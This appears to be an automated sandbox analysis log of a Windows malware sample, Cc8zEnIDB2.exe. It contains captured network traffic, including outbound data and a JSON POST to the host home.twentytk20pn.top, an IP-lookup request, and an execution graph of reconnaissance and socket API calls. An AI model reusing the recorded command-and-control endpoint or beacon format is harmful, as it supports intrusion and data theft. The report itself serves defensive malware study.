Dec 19, 2024 08:33:35.562640905 CET  2472  OUT  Data Raw: 5c 2f 61 49 67 2b 49 58 78 42 38 62 32 50 78 46 31 48 34 58 36 35 34 52 73 50 69 4e 34 5a 2b 45 32 6c 61 78 6f 48 68 37 34 6c 65 44 4e 53 38 61 51 69 34 6e 38 42 65 44 74 4b 75 37 50 57 56 74 4c 4f 77 73 74 54 73 62 58 78 46 71 57 69 6d 52 72 70
Data Ascii: \/aIg+IXxB8b2PxF1H4X654RsPiN4Z+E2laxoHh74leDNS8aQi4n8BeDtKu7PWVtLOwstTsbXxFqWimRrpR9vMNnex\/z7V\/Q3+2gcf8Ee\/wBjEf3vC37KQ\/8AMB6u39K\/no8v3\/T\/AOvX+h\/0O8LSy\/gLjnLcO6jwuW+LPFGAwkak5VJU8Nhsp4ahThzPyvOVklKpOdRrmm2\/8rfp34qpmHib4f5nXjTWKzPwZ4Sz
Dec 19, 2024 08:33:35.562747002 CET  2472  OUT  Data Raw: 31 39 4b 71 37 6b 32 5c 2f 77 62 49 5c 2f 33 76 6c 5c 2f 35 5c 2f 2b 74 39 50 58 6c 39 6e 35 5c 2f 68 5c 2f 77 54 6f 46 65 54 62 4a 4d 6a 5c 2f 49 5c 2f 6c 44 7a 66 4d 5c 2f 7a 5c 2f 77 44 72 34 2b 6c 51 78 37 31 74 39 6a 5c 2f 38 73 7a 63 65 62
Data Ascii: 19Kq7k2\/wbI\/3vl\/5\/+t9PXl9n5\/h\/wToFeTbJMj\/I\/lDzfM\/z\/wDr4+lQx71t9j\/8szcebwc\/Xv8A5\/Krm7Kun+p\/5a\/u8\/8A6v8APHpVOT93I6OLiB\/9Iil8vn0\/+tWhpT6\/L9Q8t2kf5d\/l5lz6\/riq3zyfu3Ty3\/5ZeX\/L9OuKuN\/q9+zdD5v7o+V7j\/Pf\/CHy\/M2Tfc8z\/Vx\/6j\/
Dec 19, 2024 08:33:35.562792063 CET  2472  OUT  Data Raw: 4a 64 48 30 70 50 44 65 74 78 78 61 66 61 57 36 74 5a 58 73 70 2b 7a 51 52 32 78 4d 73 69 4d 30 6b 68 4d 43 78 6c 6e 6b 59 6c 6e 5a 73 6c 32 4a 4c 5a 4a 72 38 5c 2f 4a 39 42 54 42 61 33 6e 4b 59 79 64 73 77 79 76 5c 2f 66 78 51 43 6f 48 75 6a 48
Data Ascii: JdH0pPDetxxafaW6tZXsp+zQR2xMsiM0khMCxlnkYlnZsl2JLZJr8\/J9BTBa3nKYydswyv\/fxQCoHujHHU+v8AJ2e+J2QcV53jM0oZOuF6GJnT9nl9J\/WcNR5KFGjKbxFKEJTrYidOWJxVWWGoxnXrVKjV5SZ\/buS+EXFHCWQYDK6+c0+LMThKU41cx5PqOIr81apVjGOErVKkKVDDwnHD4ajDF1nChRpwjZKMV8o\/tDX\
Dec 19, 2024 08:33:35.562825918 CET  2472  OUT  Data Raw: 35 30 6e 77 58 72 58 67 71 57 33 66 77 50 34 4f 75 64 51 6a 7a 48 5c 2f 62 39 31 71 69 76 59 61 74 70 4d 4c 79 79 77 53 61 5c 2f 59 4a 4f 71 79 36 52 72 71 61 5a 2b 54 76 5c 2f 42 56 67 35 5c 2f 62 6b 2b 4c 51 5c 2f 75 36 56 38 4d 42 5c 2f 35 69
Data Ascii: 50nwXrXgqW3fwP4OudQjzH\/b91qivYatpMLyywSa\/YJOqy6RrqaZ+Tv\/BVg5\/bk+LQ\/u6V8MB\/5i3wcf61\/S7+zZ+y38G\/2UPAreA\/g\/4dl062v7lNS8TeJNYuv7W8Y+NNaWMxnWvFevPFDJqF4Q8pgtbeCy0fTvtFymk6Zp8VxLG\/8z3\/AAVVOf25\/jAP7unfC8f+Yo8En+tfoP0bOIMpzPxs4SyLhuni48N8
Dec 19, 2024 08:33:35.562975883 CET  4944  OUT  Data Raw: 62 76 51 62 2b 30 38 76 78 5c 2f 34 42 51 2b 66 5c 2f 41 4a 61 64 4f 5c 2f 38 41 54 33 39 4b 59 47 2b 56 38 66 38 41 58 58 5c 2f 50 66 70 6b 31 5a 6b 6a 2b 35 5c 2f 6e 72 5c 2f 55 6e 33 36 56 57 53 50 45 65 39 5c 2f 6e 35 5c 2f 7a 5c 2f 38 41 57
Data Ascii: bvQb+08vx\/4BQ+f\/AJadO\/8AT39KYG+V8f8AXX\/Pfpk1Zkj+5\/nr\/Un36VWSPEe9\/n5\/z\/8AWoOin1+X6kPmdf4\/0z7UxVjZkkf\/AD\/o3\/1qm2\/wPj+fH\/1s\/l+NQ\/7f\/LP\/AOv+fTj68daDsIfvL8\/p0j5\/z7fjxULf3Nv0z\/P\/ACfr3q5Inyp8n\/fvP9PT6\/8A14Ywnzv\/AB\/8tf8AP+f1
Dec 19, 2024 08:33:35.682358027 CET  2472  OUT  Data Raw: 42 74 53 75 4a 52 70 47 71 44 43 78 76 65 32 4c 67 53 4e 6f 32 75 4a 43 71 70 42 71 74 72 47 33 6d 65 58 42 46 71 4e 74 71 46 70 43 6c 73 50 63 74 49 5c 2f 77 43 43 6b 33 37 51 4f 68 2b 4c 66 45 55 39 7a 66 61 4a 38 53 5c 2f 68 76 65 2b 4d 4e 63
Data Ascii: BtSuJRpGqDCxve2LgSNo2uJCqpBqtrG3meXBFqNtqFpClsPctI\/wCCk37QOh+LfEU9zfaJ8S\/hve+MNc17w34A+LWhWfiVPDek32q3txpFjpWvW8lr4j0i70fTLiGxsHsNaNlpzW8f2S1MMaxt+dGsan4U0Lwt4K1Vviv8I9c8ceOvhp8H\/ivovwV8NS\/GrUPianhX45eGfD3i7wGbq81D4F6R8Jm1O40HxRpN1f6dYfFO\
Dec 19, 2024 08:33:35.682389975 CET  2472  OUT  Data Raw: 74 46 65 4e 74 5a 6b 38 4f 57 57 6b 66 73 74 5c 2f 45 5c 2f 53 76 68 48 38 56 34 5a 50 45 5a 58 55 49 66 46 6d 70 65 49 39 55 38 4a 54 74 34 62 74 33 30 70 59 4e 64 30 6e 51 76 45 4e 6c 70 65 6e 2b 49 4c 77 33 4e 6c 4e 70 78 38 58 2b 44 70 52 61
Data Ascii: tFeNtZk8OWWkfst\/E\/SvhH8V4ZPEZXUIfFmpeI9U8JTt4bt30pYNd0nQvENlpen+ILw3NlNpx8X+DpRaTx62Db9FdaFrEHjCx8D2WoeC9e8QH4u+Gvgj4psdC8Q6zPN8MPHXij4b6X8VLKL4ntqXhLSrXwxo1l4Xfxp\/bOtW93q9lpGofCT4qQ3zxW3heK81L8fj4a\/QxklJRyDkvh06j4042VGH1rBZTmGFlVqvP1SpQxG
Dec 19, 2024 08:33:36.744590998 CET  212  IN  HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.10  49715        194.87.47.113   80                7540  C:\Users\user\Desktop\Cc8zEnIDB2.exe
Timestamp  Bytes transferred  Direction  Data
Dec 19, 2024 08:33:37.950433969 CET  287  OUT  POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
Content-Type: application/json
Content-Length: 143
Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 19, 2024 08:33:39.272774935 CET  212  IN  HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49703        98.85.100.80    443               7540  C:\Users\user\Desktop\Cc8zEnIDB2.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-19 07:33:33 UTC  52  OUT  GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-19 07:33:34 UTC  224  IN  HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 07:33:34 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-19 07:33:34 UTC  31  IN  Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 02:33:28
Start date: 19/12/2024
Path: C:\Users\user\Desktop\Cc8zEnIDB2.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Cc8zEnIDB2.exe"
Imagebase: 0x4d0000
File size: 4'430'848 bytes
MD5 hash: A0D6C9D4D75289FFA8F7DBDA90E3FCE6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 7.5%
Signature Coverage: 15.1%
Total number of Nodes: 681
Total number of Limit Nodes: 96
                                                      execution_graph 91338 508b50 91339 508b6b 91338->91339 91360 508be6 91338->91360 91340 508bf3 91339->91340 91341 508b8f 91339->91341 91339->91360 91371 50a550 91340->91371 91442 4e6e40 select 91341->91442 91345 508cd9 SleepEx getsockopt 91346 508d18 91345->91346 91351 508d43 91346->91351 91356 508cb2 91346->91356 91347 508e85 91352 508eae 91347->91352 91347->91360 91448 4e2a00 localeconv localeconv 91347->91448 91348 50a150 3 API calls 91361 508dff 91348->91361 91349 508c35 91430 50a150 91349->91430 91350 508c1f connect 91350->91349 91359 50a150 3 API calls 91351->91359 91352->91360 91449 4d78b0 closesocket 91352->91449 91353 508bb5 91353->91360 91444 5150a0 localeconv localeconv 91353->91444 91356->91347 91356->91348 91356->91360 91359->91353 91361->91347 91446 4ed090 localeconv localeconv 91361->91446 91364 508dc8 91445 50b100 localeconv localeconv 91364->91445 91365 508ba1 91365->91345 91365->91353 91365->91356 91366 508e67 91447 514fd0 localeconv localeconv 91366->91447 91370 508c8b 91370->91364 91370->91365 91372 50a575 91371->91372 91374 50a597 91372->91374 91453 4d75e0 91372->91453 91424 50a6d9 91374->91424 91465 50ef30 91374->91465 91376 50a709 91378 4d78b0 3 API calls 91376->91378 91386 50a713 91376->91386 91378->91386 91379 508bfc 91379->91349 91379->91350 91379->91356 91379->91360 91381 50a7e5 91385 50a811 setsockopt 91381->91385 91391 50a87c 91381->91391 91401 50a8ee 91381->91401 91382 50a641 91382->91381 91479 514fd0 localeconv localeconv 91382->91479 91385->91391 91393 50a83b 91385->91393 91386->91379 91478 5150a0 localeconv localeconv 91386->91478 91387 50a69b 91475 4ed090 localeconv localeconv 91387->91475 91389 50a6c9 91476 514f40 localeconv localeconv 91389->91476 91391->91401 91482 50b1e0 localeconv localeconv 91391->91482 91393->91391 91480 4ed090 localeconv localeconv 91393->91480 91396 50af56 91397 50af5d 91396->91397 91396->91424 91397->91386 91400 50a150 3 API calls 91397->91400 91398 
50a86d 91481 514fd0 localeconv localeconv 91398->91481 91400->91386 91402 50abb9 91401->91402 91404 50ae32 91401->91404 91405 50acb8 91401->91405 91413 50af33 91401->91413 91421 50abe1 91401->91421 91401->91424 91407 50ad45 91402->91407 91409 50ade6 91402->91409 91402->91421 91484 506be0 10 API calls 91402->91484 91403 50b056 91493 4ed090 localeconv localeconv 91403->91493 91404->91402 91490 514fd0 localeconv localeconv 91404->91490 91405->91402 91415 50acdc 91405->91415 91405->91424 91406 50af03 91406->91413 91491 514fd0 localeconv localeconv 91406->91491 91407->91409 91412 50ad5f 91407->91412 91488 4ed090 localeconv localeconv 91409->91488 91485 5220d0 localeconv localeconv 91412->91485 91474 5367e0 ioctlsocket 91413->91474 91483 4ed090 localeconv localeconv 91415->91483 91418 50b07b 91494 514f40 localeconv localeconv 91418->91494 91419 50ad7b 91422 50adb7 91419->91422 91486 514fd0 localeconv localeconv 91419->91486 91421->91403 91421->91406 91421->91424 91492 514fd0 localeconv localeconv 91421->91492 91487 523030 localeconv localeconv 91422->91487 91424->91376 91424->91386 91477 4e2a00 localeconv localeconv 91424->91477 91427 50ad01 91489 514f40 localeconv localeconv 91427->91489 91431 508c4d 91430->91431 91432 50a15f 91430->91432 91431->91370 91443 5150a0 localeconv localeconv 91431->91443 91432->91431 91433 50a181 getsockname 91432->91433 91434 50a1d0 91433->91434 91435 50a1f7 91433->91435 91501 4ed090 localeconv localeconv 91434->91501 91436 50ef30 2 API calls 91435->91436 91440 50a20f 91436->91440 91438 50a1eb 91503 514f40 localeconv localeconv 91438->91503 91440->91431 91502 4ed090 localeconv localeconv 91440->91502 91442->91365 91443->91370 91444->91360 91445->91356 91446->91366 91447->91347 91448->91352 91450 4d78d7 91449->91450 91451 4d78c5 91449->91451 91450->91360 91504 4d72a0 localeconv localeconv 91451->91504 91454 4d75ef 91453->91454 91455 4d7607 socket 91453->91455 91454->91455 91458 4d7601 91454->91458 91459 4d7643 91454->91459 91456 4d763a 
91455->91456 91457 4d762b 91455->91457 91456->91374 91495 4d72a0 localeconv localeconv 91457->91495 91458->91455 91496 4d72a0 localeconv localeconv 91459->91496 91462 4d7654 91497 4dcb20 localeconv localeconv 91462->91497 91464 4d7674 91464->91374 91466 50ef47 91465->91466 91467 50efa8 91465->91467 91469 50ef81 91466->91469 91470 50ef4c 91466->91470 91468 50a63a 91467->91468 91500 4dc960 localeconv localeconv 91467->91500 91468->91382 91468->91387 91499 533d10 localeconv localeconv 91469->91499 91470->91468 91498 533d10 localeconv localeconv 91470->91498 91474->91396 91475->91389 91476->91424 91477->91376 91478->91379 91479->91381 91480->91398 91481->91391 91482->91401 91483->91427 91484->91407 91485->91419 91486->91422 91487->91421 91488->91427 91489->91424 91490->91402 91491->91413 91492->91421 91493->91418 91494->91424 91495->91456 91496->91462 91497->91464 91498->91468 91499->91468 91500->91468 91501->91438 91502->91438 91503->91431 91504->91450 91965 5095b0 91966 5095c8 91965->91966 91968 5095fd 91965->91968 91967 50a150 3 API calls 91966->91967 91966->91968 91967->91968 91969 90d270 91981 85dd30 91969->91981 91971 90d2a6 91972 90d29a 91972->91971 91985 8612a0 91972->91985 91974 90d2e6 91975 90d2da 91975->91974 91989 90d490 91975->91989 91977 90d36d 91979 90d30f 91979->91977 91998 914780 91979->91998 91980 90d456 91982 85dd41 91981->91982 91983 85d1b0 2 API calls 91982->91983 91984 85dd69 91983->91984 91984->91972 91986 8612ac 91985->91986 92006 85e030 91986->92006 91988 8612da 91988->91975 91990 90d4da 91989->91990 91991 90d4f3 91990->91991 91992 90d5e0 91990->91992 91994 90d596 91990->91994 91991->91979 92054 85b4e0 localeconv localeconv 91992->92054 91995 90d5d4 91994->91995 92055 85b4e0 localeconv localeconv 91994->92055 91995->91979 91996 90d609 91996->91979 91999 861340 2 API calls 91998->91999 92001 9147b2 91999->92001 92000 9147be 92000->91980 92001->92000 92002 861340 2 API calls 92001->92002 92003 914803 92002->92003 92005 91481c 92003->92005 92056 
861400 localeconv localeconv 92003->92056 92005->91980 92007 85e07d localeconv localeconv 92006->92007 92035 85e4e3 92006->92035 92021 85e0ae 92007->92021 92008 85df40 fgetc 92008->92021 92010 85e16e 92013 85ed70 ungetc 92010->92013 92036 85e186 92010->92036 92011 860230 ungetc 92011->92035 92012 85e223 92012->92036 92037 85e24f 92012->92037 92045 85df40 fgetc 92012->92045 92013->92036 92014 85eb32 92016 85eb43 92014->92016 92017 85e7fa 92014->92017 92015 85fec7 92052 85dfd0 ungetc 92015->92052 92018 85f0b5 92016->92018 92032 85eb5a 92016->92032 92029 85e830 92017->92029 92017->92032 92050 85df40 fgetc 92018->92050 92019 85fe96 isxdigit 92019->92035 92021->92008 92021->92010 92021->92012 92030 85e368 92021->92030 92021->92035 92021->92036 92024 85e699 92024->92032 92024->92035 92038 85e6c4 92024->92038 92026 860722 ungetc 92026->92036 92028 861184 ungetc 92028->92035 92029->92036 92047 85df40 fgetc 92029->92047 92030->92014 92030->92024 92030->92035 92030->92036 92043 860098 ungetc 92030->92043 92049 85df40 fgetc 92030->92049 92031 8608b7 ungetc 92031->92035 92032->92035 92032->92036 92048 85df40 fgetc 92032->92048 92034 85f0c8 92034->92035 92034->92036 92051 85df40 fgetc 92034->92051 92035->92011 92035->92015 92035->92019 92035->92028 92035->92031 92035->92036 92035->92037 92041 860e1e ungetc 92035->92041 92042 85df40 fgetc 92035->92042 92044 85ffe6 ungetc 92035->92044 92053 85dfd0 ungetc 92035->92053 92036->91988 92037->92026 92037->92036 92038->92036 92046 85df40 fgetc 92038->92046 92041->92035 92042->92035 92043->92030 92044->92035 92045->92012 92046->92035 92047->92035 92048->92035 92049->92030 92050->92034 92051->92034 92052->92036 92053->92035 92054->91996 92055->91996 92056->92005 92057 506ab0 92058 506ad5 92057->92058 92059 506bb4 92058->92059 92061 4e6fa0 select 92058->92061 92060 585ed0 9 API calls 92059->92060 92062 506ba9 92060->92062 92063 506b54 92061->92063 92063->92059 92063->92062 92064 506b5d 92063->92064 92064->92062 92066 585ed0 92064->92066 
92069 585a50 92066->92069 92068 585ee5 92068->92064 92070 585a58 92069->92070 92076 585ea0 92069->92076 92071 585b50 92070->92071 92073 585b88 92070->92073 92084 585a99 92070->92084 92071->92073 92077 585b7a 92071->92077 92078 585eb4 92071->92078 92072 585e96 92108 599480 7 API calls 92072->92108 92074 585cae 92073->92074 92104 586d50 localeconv localeconv 92073->92104 92105 585ef0 6 API calls 92073->92105 92074->92072 92090 59a920 92074->92090 92106 586d50 localeconv localeconv 92074->92106 92107 599320 7 API calls 92074->92107 92076->92068 92094 5870a0 92077->92094 92109 586f10 7 API calls 92078->92109 92082 585ec2 92082->92082 92084->92073 92087 5870a0 8 API calls 92084->92087 92103 586f10 7 API calls 92084->92103 92087->92084 92091 59a944 92090->92091 92092 59a94b 92091->92092 92093 59a977 send 92091->92093 92092->92074 92093->92074 92095 5870ae 92094->92095 92097 58717f 92095->92097 92101 5871a7 92095->92101 92110 59a8c0 92095->92110 92114 5871c0 6 API calls 92095->92114 92097->92101 92115 586d50 localeconv localeconv 92097->92115 92099 58719f 92116 599320 7 API calls 92099->92116 92101->92073 92103->92084 92104->92073 92105->92073 92106->92074 92107->92074 92108->92076 92109->92082 92111 59a903 recvfrom 92110->92111 92112 59a8e6 92110->92112 92113 59a8ed 92111->92113 92112->92111 92112->92113 92113->92095 92114->92095 92115->92099 92116->92101 92117 719053b 92118 719054e Process32FirstW 92117->92118 92120 719057b 92118->92120 91505 4d13c9 91507 4d1160 91505->91507 91508 4d13a1 91507->91508 91509 858a20 15 API calls 91507->91509 91509->91507 92121 85b160 Sleep 92122 4ed5e0 92123 4ed652 WSAStartup 92122->92123 92124 4ed5f0 92122->92124 92123->92124 92125 4ed664 92123->92125 92127 4ed67c 92124->92127 92129 4ed690 localeconv localeconv 92124->92129 92128 4ed5fa 92129->92128 91510 4d255d 91541 859f70 91510->91541 91513 4d2589 91514 4d25a0 GlobalMemoryStatusEx 91513->91514 91515 4d25ec 91514->91515 91543 71503ba 91515->91543 91547 715036b 91515->91547 91551 7150428 
91515->91551 91555 71504ab 91515->91555 91559 71503e0 91515->91559 91563 7150443 91515->91563 91566 7150304 91515->91566 91570 7150384 91515->91570 91574 715041a 91515->91574 91578 71502f2 91515->91578 91582 715033e 91515->91582 91586 71503f9 91515->91586 91590 71502f0 91515->91590 91594 7150431 91515->91594 91598 7150395 91515->91598 91602 7150315 91515->91602 91516 4d263c GetDriveTypeA 91518 4d2655 GetDiskFreeSpaceExA 91516->91518 91520 4d261b 91516->91520 91517 4d2762 91519 4d27d6 KiUserCallbackDispatcher 91517->91519 91518->91520 91521 4d27f8 91519->91521 91520->91516 91520->91517 91522 4d28d9 FindFirstFileW 91521->91522 91523 4d2906 FindNextFileW 91522->91523 91524 4d2928 91522->91524 91523->91523 91523->91524 91542 4d256c GetSystemInfo 91541->91542 91542->91513 91544 7150382 GetLogicalDrives 91543->91544 91546 715046a 91544->91546 91546->91520 91548 715037b GetLogicalDrives 91547->91548 91550 715046a 91548->91550 91550->91520 91552 7150435 GetLogicalDrives 91551->91552 91554 715046a 91552->91554 91554->91520 91556 715046a 91555->91556 91557 715044e GetLogicalDrives 91555->91557 91556->91520 91557->91556 91560 71503ef GetLogicalDrives 91559->91560 91562 715046a 91560->91562 91562->91520 91564 715045e GetLogicalDrives 91563->91564 91565 715046a 91564->91565 91565->91520 91567 715030a GetLogicalDrives 91566->91567 91569 715046a 91567->91569 91569->91520 91571 715038f GetLogicalDrives 91570->91571 91573 715046a 91571->91573 91573->91520 91575 715041d GetLogicalDrives 91574->91575 91577 715046a 91574->91577 91575->91577 91577->91520 91579 715030a GetLogicalDrives 91578->91579 91581 715046a 91579->91581 91581->91520 91583 715037c GetLogicalDrives 91582->91583 91585 715046a 91583->91585 91585->91520 91587 715040c GetLogicalDrives 91586->91587 91589 715046a 91587->91589 91589->91520 91591 715030a GetLogicalDrives 91590->91591 91593 715046a 91591->91593 91593->91520 91595 715043c GetLogicalDrives 91594->91595 91597 715046a 91595->91597 91597->91520 91599 7150335 
GetLogicalDrives 91598->91599 91601 715046a 91599->91601 91601->91520 91603 7150335 GetLogicalDrives 91602->91603 91605 715046a 91603->91605 91605->91520 91606 50b400 91607 50b425 91606->91607 91608 50b40b 91606->91608 91611 4d7770 91608->91611 91609 50b421 91612 4d77b6 recv 91611->91612 91613 4d7790 91611->91613 91615 4d77a3 91612->91615 91621 4d77d4 91612->91621 91613->91612 91614 4d7799 91613->91614 91614->91615 91616 4d77db 91614->91616 91622 4d72a0 localeconv localeconv 91615->91622 91623 4d72a0 localeconv localeconv 91616->91623 91619 4d77ec 91624 4dcb20 localeconv localeconv 91619->91624 91621->91609 91622->91621 91623->91619 91624->91621 91625 50e400 91626 50e412 91625->91626 91634 50e459 91625->91634 91631 50e422 91626->91631 91649 523030 localeconv localeconv 91626->91649 91627 50e4a8 91630 50e42b 91651 5068b0 7 API calls 91630->91651 91650 5309d0 localeconv localeconv 91631->91650 91633 50e495 91633->91627 91636 50b5a0 2 API calls 91633->91636 91634->91627 91634->91633 91637 50b5a0 91634->91637 91636->91627 91638 50b5d2 91637->91638 91639 50b5c0 91637->91639 91638->91633 91639->91638 91640 50b713 91639->91640 91643 50b626 91639->91643 91653 514f40 localeconv localeconv 91640->91653 91642 50b65a 91642->91638 91644 50b737 91642->91644 91645 50b72b 91642->91645 91643->91638 91643->91642 91643->91644 91643->91645 91652 5150a0 localeconv localeconv 91643->91652 91644->91638 91655 5150a0 localeconv localeconv 91644->91655 91645->91638 91654 5150a0 localeconv localeconv 91645->91654 91649->91631 91650->91630 91651->91634 91652->91643 91653->91638 91654->91638 91655->91638 91656 50f100 91658 50f11f 91656->91658 91683 50f1b8 91656->91683 91657 50ff1a 91706 510c80 localeconv localeconv 91657->91706 91660 50f2a3 91658->91660 91674 50f240 91658->91674 91678 50f603 91658->91678 91658->91683 91691 514f40 localeconv localeconv 91660->91691 91662 510045 91665 51010d 91662->91665 91668 51004d 91662->91668 91662->91683 91709 5150a0 localeconv localeconv 91662->91709 91663 
50f80d 91667 51015e 91665->91667 91710 5150a0 localeconv localeconv 91665->91710 91666 51008a 91708 514f40 localeconv localeconv 91666->91708 91667->91668 91711 5150a0 localeconv localeconv 91667->91711 91712 514f40 localeconv localeconv 91668->91712 91674->91683 91692 4d7310 91674->91692 91676 50f491 91676->91678 91682 4d7310 2 API calls 91676->91682 91678->91657 91678->91662 91678->91663 91678->91666 91680 510d30 localeconv localeconv 91678->91680 91688 5150a0 localeconv localeconv 91678->91688 91704 4dfa50 localeconv localeconv 91678->91704 91705 514fd0 localeconv localeconv 91678->91705 91679 50ff5b 91679->91683 91707 5150a0 localeconv localeconv 91679->91707 91680->91678 91689 50f50d 91682->91689 91684 50f3ce 91684->91676 91684->91683 91701 5150a0 localeconv localeconv 91684->91701 91686 50f5b9 91703 4dfa50 localeconv localeconv 91686->91703 91688->91678 91689->91683 91689->91686 91702 5150a0 localeconv localeconv 91689->91702 91691->91683 91693 4d7320 91692->91693 91697 4d7332 91692->91697 91694 4d7390 91693->91694 91693->91697 91714 4d72a0 localeconv localeconv 91694->91714 91696 4d73a1 91715 4dcb20 localeconv localeconv 91696->91715 91698 4d7380 91697->91698 91713 4d72a0 localeconv localeconv 91697->91713 91698->91684 91701->91676 91702->91686 91703->91678 91704->91678 91705->91678 91706->91679 91707->91683 91708->91683 91709->91665 91710->91667 91711->91668 91712->91683 91713->91698 91714->91696 91715->91698 91716 50b3c0 91717 50b3cb 91716->91717 91718 50b3ee 91716->91718 91722 4d76a0 91717->91722 91733 509290 91717->91733 91719 50b3ea 91723 4d76e6 send 91722->91723 91724 4d76c0 91722->91724 91725 4d76d3 91723->91725 91732 4d7704 91723->91732 91724->91723 91726 4d76c9 91724->91726 91747 4d72a0 localeconv localeconv 91725->91747 91726->91725 91728 4d770b 91726->91728 91748 4d72a0 localeconv localeconv 91728->91748 91730 4d771c 91749 4dcb20 localeconv localeconv 91730->91749 91732->91719 91734 4d76a0 3 API calls 91733->91734 91735 5092e5 91734->91735 91736 
5093c3 91735->91736 91738 5092f3 91735->91738 91741 509392 91736->91741 91750 4ed090 localeconv localeconv 91736->91750 91737 5093be 91737->91719 91738->91741 91742 509335 WSAIoctl 91738->91742 91740 5093f7 91751 514f40 localeconv localeconv 91740->91751 91741->91737 91752 5150a0 localeconv localeconv 91741->91752 91742->91741 91745 509366 91742->91745 91745->91741 91746 509371 setsockopt 91745->91746 91746->91741 91747->91732 91748->91730 91749->91732 91750->91740 91751->91741 91752->91737 91753 510700 91763 510719 91753->91763 91768 51099d 91753->91768 91755 4d7310 2 API calls 91755->91763 91757 5109f6 91778 4d75a0 91757->91778 91758 5109b5 91758->91768 91777 5150a0 localeconv localeconv 91758->91777 91760 510a35 91782 514f40 localeconv localeconv 91760->91782 91763->91755 91763->91757 91763->91758 91763->91760 91763->91768 91771 50b8e0 localeconv localeconv 91763->91771 91772 53f570 localeconv localeconv 91763->91772 91773 4feb30 localeconv localeconv 91763->91773 91774 5313a0 localeconv localeconv 91763->91774 91775 5539a0 localeconv localeconv 91763->91775 91776 4feae0 localeconv localeconv 91763->91776 91769 4d75a0 2 API calls 91769->91768 91771->91763 91772->91763 91773->91763 91774->91763 91775->91763 91776->91763 91777->91768 91779 4d75aa 91778->91779 91781 4d75d1 91778->91781 91779->91781 91783 4d72a0 localeconv localeconv 91779->91783 91781->91769 91782->91768 91783->91781 92130 4d29ff FindFirstFileA 92131 4d2a31 92130->92131 92132 4d2a5c RegOpenKeyExA 92131->92132 92133 4d2a93 92132->92133 92134 4d2ade CharUpperA 92133->92134 92136 4d2b0a 92134->92136 92135 4d2bf9 QueryFullProcessImageNameA 92137 4d2c3b CloseHandle 92135->92137 92136->92135 92139 4d2c64 92137->92139 92138 4d2df1 CloseHandle 92140 4d2e23 92138->92140 92139->92138 91784 4d3d5e 91789 4d3d30 91784->91789 91785 4d3d90 91793 4dfcb0 8 API calls 91785->91793 91788 4d3dc1 91789->91784 91789->91785 91790 4e0ab0 91789->91790 91794 4e05b0 91790->91794 91793->91788 91795 4e07c7 91794->91795 91803 
4e05bd 91794->91803 91795->91789 91796 4e066a 91813 50dec0 91796->91813 91800 4e067b 91807 4e06f0 91800->91807 91809 4e07ce 91800->91809 91820 4e73b0 localeconv localeconv 91800->91820 91803->91795 91803->91796 91803->91809 91818 4e03c0 localeconv localeconv 91803->91818 91819 4e7450 localeconv localeconv 91803->91819 91804 4e0707 WSAEventSelect 91804->91807 91804->91809 91805 4e07ef 91805->91809 91811 4e0847 91805->91811 91822 4e6fa0 91805->91822 91807->91804 91807->91805 91808 4d76a0 3 API calls 91807->91808 91808->91807 91821 4e7380 localeconv localeconv 91809->91821 91810 4e09e8 WSAEnumNetworkEvents 91810->91811 91812 4e09d0 WSAEventSelect 91810->91812 91811->91809 91811->91810 91811->91812 91812->91810 91812->91811 91814 50df1e 91813->91814 91816 50dece 91813->91816 91826 50df30 91816->91826 91817 50def9 91817->91800 91818->91803 91819->91803 91820->91800 